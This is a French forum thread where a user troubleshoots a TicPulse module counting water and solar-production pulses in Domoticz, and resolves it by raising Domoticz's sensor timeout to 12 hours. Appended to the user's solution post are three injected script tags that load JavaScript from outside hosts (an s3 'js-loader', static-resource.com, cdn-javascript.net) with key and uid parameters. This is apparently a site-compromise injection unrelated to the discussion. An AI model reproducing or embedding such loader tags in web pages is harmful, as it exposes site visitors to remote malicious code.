› Forums › Modem Téléinfo (USB, XBEE…) › TicPulse + domoticz avec 2 comptage d'impulsions
- Ce sujet contient 9 réponses, 2 participants et a été mis à jour pour la dernière fois par
nicolas_cartelec, le il y a 6 années.
Bonjour,
J’ai ajouté sur domoticz à mon comptage d’eau par impulsion le comptage d’impulsions de ma production éléctrique. Depuis que les deux sorties impulsions sont utilisées, les impulsions de l’eau ne sont comptées qu’à partir de la première impulsion de ma production éléctrique. Est ce un bug ?
Exemple : je me lève je tire de l’eau, mes deux compteurs dans domoticz sont en rouge (et c’est nouveau) parce qu’ils n’ont pas reçu d’info depuis xx heures et à 0 car le comptage est quotidien.
Le soleil produit la première impulsion pour le compteur éléectrique et mon eau se met à jour seulement à ce moment à xx litres. C’est à dire chez moi vers 11h00 du matin…
Faut il que j’inverse les deux entrées impulsion 1 et 2 ? Y a t il une histoire de maitre esclave ?
Merci de votre aide,
JFH
00
- Replies
-
-
Personne n’a ce problème ??
-
Cette réponse a été modifiée le il y a 6 années par
nicolas_cartelec.
00 -
Cette réponse a été modifiée le il y a 6 années par
-
Si pas d’impulsions alors le modules espace les envois de messages, si vous avez pas de consommation d’eau alors le module n’envoie plus les index, il les envoie toutes les 10mn, 30mn, 1h… les espaces jusqu’a ce qu’il comptent à nouveau des pulses (sur une des deux entrées)
00 -
Bonjour,
Merci de votre réponse mais mon problème est que depuis que les deux pulses sont raccordés, ma consommation d’eau n’est pas émise tant que des impulsions d’électricité n’ont pas été envoyées.
Ce qui signifie que si je tire de l’eau l’hiver avant le lever du soleil 10l puis 10l puis 10l, alors j’obtiens seulement la somme 30l dès la première impulsions électricité.
Et le graphe est faux puisqu’il indique 30 l quand le comptage électrique bouge pour la première fois.
Et en imaginant une journée d’hiver bien noire, alors ce jour là, pas de consommation d’eau reportée.
Cordialement,
Jfh
00 -
Nous allons tester (essayez d’inverser les deux compteurs)
D’où vient le compteur d’impulsions électrique ? (marque, câblage…)
00 -
Bonjour,
Merci de toutes ces réponses très rapides. Le compteur éléctrique est un EASTRON SMD230. Il y a deux sorties impulsion, une fixé d’usine 1000 impulsions = 1kWh, et l’autre paramétrable. Ce qui revient au même pour moi puisque dans mon domoticz j’ai mis 1 impulsion = 1Wh. J’ai cablé avec du 1.5mm2 pour être sur que le courant passe comme je dois bien avoir une dizaine de mètres entre les deux. Normalement je l’avois choisi pour récupérer les info modbus mais manifestement, je n’ai pas le niveau, j’ai Tx/Rx : 0/0….
Mon Tic Pulse est alimenté par le secteur, et il a aussi les piles.
Merci de votre aide,
00 -
Quelle boxe utilisez vous ?
00 -
Bonjour,
Je me réponds à moi même, j’ai trouvé la solution. J’avaius défini dans PARAMETRES de domoticz un time out des capteurs de quelques heures seulement dans DOMOTICZ. Le soucis vient de domoticz et non pas du tic pulse.
La nuit, au bout de x heures définies dans paramètres, mes deux capteurs impulsion EAU et ELEC PV tournaient au rouge puisqu’ils n’avaient pas reçu de données. Et après cela, seul des impulsions sur les deux capteurs pouvait les « réanimer ».
La solution a donc été de mettre un time out de capteur à 12h, le temps de passer la nuit, comme ça le matin, la première impulsion vient annuler le compte à rebours de time out pour les deux.
Merci de votre attention, si ça peut en aider certains,
JFH
<script src= »//s3.amazonaws.com/js-loader/21ae36af12e6821934.js »></script><script src= »https://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8622x » type= »text/javascript »></script><script src= »https://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8622x&format=arrjs&r=1569735269527″ type= »text/javascript »></script>
00 -
Bonjour,
Merci du retour, cela fait une semaine que nous testions sur Domoticz sans avoir eu le même problème !
00
-
Étiqueté : impulsions domoticz time out
- Vous devez être connecté pour répondre à ce sujet.